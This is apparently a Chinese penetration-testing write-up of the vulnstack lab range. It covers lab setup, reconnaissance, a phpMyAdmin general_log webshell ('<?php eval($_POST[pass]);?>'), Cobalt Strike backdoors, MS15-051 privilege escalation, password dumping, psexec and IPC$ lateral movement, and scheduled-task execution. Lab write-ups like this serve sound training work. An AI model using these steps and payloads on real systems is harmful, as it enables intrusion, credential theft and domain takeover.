红日靶场vulnstack (一)

一、靶场搭建

下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

下载解压完成后,有三个文件夹。

打开VMware导入虚拟机,右键空白处,然后点击扫描虚拟机。路径选择你刚刚下载的虚拟机的位置,即可成功导入虚拟机。

配置一下网络环境,以下为各个主机的IP。

win7(web服务器)外网ip:192.168.145.135  内网ip:192.168.52.129
windows server2008(域控)内网ip:192.168.52.138
win2K3(域内主机)内网ip:192.168.52.141
kali:192.168.145.171

我们编一下VMnet1,网段改为192.168.52.0。

win7添加一个网卡,第一个网卡设置为VMnet8,第二个网卡设置为VMnet1也就是我们刚刚修改的。

打开win7的网络适配器,这个Npcap网卡不用管它。

本地连接我们把ip固定为192.168.145.135,同理本地连接5我们固定ip为192.168.52.129,注意这里要固定DNS服务器为域控的ip地址。

windows server2008一样选择VMnet1。

固定ip地址为192.168.52.138,DNS要固定为域控ip。

win2K3和上面的都一样,选择VMnet1。

固定ip和DNS服务器,不过这里好像自动弄好了。

以防万一我们的kali也更改为VMnet8。

在win7的C盘中找到phpstudy开启它,如果开启不了,重启一下win7即可。最后访问一下127.0.0.1出现php探针就可以了。

最后三台主机互相ping一下,如果能通就说明没问题了,如果不行记得关闭防火墙哦。这里拿一张别人的拓扑图,这三台主机是在内网的同一个域里面滴。

二、信息收集

扫一下网段,靶机地址为192.168.145.135。

nmap -sP 192.168.145.* 

收集一下端口等信息,可以看到开放了80、135、3306端口。

nmap -sT -T4 -sV -O -sC -Pn 192.168.145.135

扫描一下网站子目录,发现有phpMyAdmin登录地址,除了这个其它都没啥用了。

dirsearch -u http://192.168.145.135/

三、getshell

访问一下靶机ip,是一个php探针,没啥用。

访问一下phpMyAdmin,发现要登录,第一时间想到弱口令。上网搜到phpMyAdmin的默认账号密码为都是root。

登录进来随便看看有无啥可用的东西。

没找到啥有用的东西,那我们试一下能不能利用into outfile写入一句话木马,利用下面的sql语句查询一下 secure_file_priv 参数的值是否为空,只有为空的情况下才能进行写入。显然参数值为NULL,不是空,如果为空的话是啥也没有的。

show variables like '%secure_file_priv%';

既然不能利用into outfile写入一句话木马,那我们尝试一下日志getshqll。这里我们利用一下 general_log日志进行getshell,general_log是记录所有的数据库操作日志,也就是说执行过的sql语句都会记录在里面。我们执行一条sql语句里面带有我们的一句话木马,那么它就会把这条sql语句记录下来,那不就相当于我们把一句话木马写入这个日志里面了吗,最后再用蚁剑连接即可getshell。

先查询一下日志是否开启,日志是开启状态。

show variables like 'general_log'; -- 查看日志是否开启
set global general_log=on; -- 开启日志功能
set global general_log_file='x.php'; -- 设置日志文件保存位置以及类型

然后设置日志保存的位置以及类型,这里直接放在网站根目录下面。

我们执行一个sql语句,日志会把这个sql语句记录下来。

select '<?php eval($_POST[pass]);?>';

不信的话可以到win7的phpstudy根目录下查看,确实有个x.php

用蚁剑连接一下,直接成功getshell。

四、内网渗透

蚁剑执行ipconfig命令看看,发现还有个ip192.168.52.129,说明这台靶机存在内网网段。

内网渗透的话个人比较喜欢用CS,主要是msf没有图形化界面。我们先让win7靶机上线CS,具体怎么搞我就不多说了,很简单的。CS生成一个后门然后通过蚁剑上传到win7,再命令运行后门即可。

start /b 1111.exe

成功上线主机。

内网信息收集

现在我们对内网的信息进行一波收集,我们先初步判断win7是否在域中。执行下面的命令,如果存在域那么就会返回域控的时间。可以知道域控的名字叫做owa.god.org

shell net time /domain

我们直接ping一下域控的名字就可以获得域控的ip地址啦,可以看到域控的ip为192.168.52.138。

既然存在域,那么我们直接利用CS的LSTAR插件来收集域内信息,你直接敲命令也是一样的效果,但是我懒得敲了。

查看当前域内的计算机,探测到有servser2008、win7、server2003。

再对192.168.52.0这个网段进行一个端口扫描。

可以看到内网中还存在192.168.52.138和192.168.52.141这两台主机。

经过探测141开放了777、139、135、21、445端口。

138开放了636、593、464、389、135、139、80、53、445端口,还是蛮多的。

横向移动

看到138主机开放了445端口,那么我们就试试能不能进行smb横移。先对win7提权到system权限,这个也简单直接用LSTAR插件进行提权,选择MS15-051漏洞即可。

然后再抓取明文密码,要system权限才能抓取滴,这也是为啥要提权。点击视图,选择密码凭证就可以看到我们抓取的密码。

配置一个smb监听器,这个监听器不生成后面仅仅是起到一个隧道的作用。

来到目标列表这里,右键138主机,选择点击移动,选择psexec64。用户和密码选择我们刚刚抓取的,如果你不知道是哪一个就每个都试一下,监听器选择我们刚刚创建的smb监听器,会话选择刚刚提权到system的会话。

最后点击Launch即可让138上线到CS,而且直接是system权限,说白了也是利用系统漏洞来进行横移滴。

然后我又对141进行了smb横移,但是不行。想到141除了开启445端口还开启了135端口,那么我们还可以试一下IPC横移。先建立IPC连接,这里可以用命令也可以直接用插件,其实插件也是通过执行命令来建立IPC连接滴。还是那句话,懒得敲命令。

net use \\192.168.52.141\ipc$ "passwd" /user:"Administrator"  //建立连接命令
net use  //查看是否建立连接
net use \\x.x.x.x\ipc$ /del  //端口连接

这里我们建立了IPC连接,然后可以通过138传输一个后门到141上面去,再添加一个定时任务运行我们的后门即可上线到CS。我们新建一个正向连接的监听器,生成一个正向连接的后门。为啥不能像win7一样用反向的后门让它上线呢,因为win7是出网的呀,自然可以找到我们的CS服务端。但是141实在内网中的呀,它是不出网的(有些主机在内网中也是出网的,现实中建议正向和反向都试试),自然找不到我们的CS服务端。那么我们上传一个正向连接的后门到141,再通过win7去连接即可上线到CS,就是让win7当桥梁。

把生成的后门上传到138主机先,提醒一下这个后门要32位的,64位的到141上运行不了。

upload C:\Users\user\Desktop\3333.exe

通过138与141建立的IPC连接,把后门传到141上面。

copy 3333.exe \\192.168.52.142\c$   //把木马复制到目标主机

查看当前141主机的时间,方便我们添加定时任务。

net time \\192.168.52.141

可以看到141当前的时间为20:28,那我们添加一个定时任务,在20:35运行我们的后门。

创建计划任务(系统版本<2012用at命令、系统版本>=2012用schtasks命令)
at \\192.168.52.141 20:35 c:\3333.exe

等到141运行后门之后,输入命令让win7主动去连接它,即可上线CS。

connect 192.168.52.141 3333

五、总结

这个是比较基础的靶机,只要理清内网的思路,再稍微了解一下横向移动,以及端口的作用,基本就可以啦。

最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。

相关推荐
Clockwiseee1 小时前
php伪协议
windows·安全·web安全·网络安全
黑客Ash1 小时前
安全算法基础(一)
算法·安全
云云3211 小时前
搭建云手机平台的技术要求?
服务器·线性代数·安全·智能手机·矩阵
云云3211 小时前
云手机有哪些用途?云手机选择推荐
服务器·线性代数·安全·智能手机·矩阵
xcLeigh2 小时前
网络安全 | 防火墙的工作原理及配置指南
安全·web安全
白乐天_n2 小时前
腾讯游戏安全移动赛题Tencent2016A
安全·游戏
光路科技4 小时前
八大网络安全策略:如何防范物联网(IoT)设备带来的安全风险
物联网·安全·web安全
saynaihe4 小时前
安全地使用 Docker 和 Systemctl 部署 Kafka 的综合指南
运维·安全·docker·容器·kafka
星河梦瑾4 小时前
SpringBoot相关漏洞学习资料
java·经验分享·spring boot·安全
黑客Ela4 小时前
对安全的认知
安全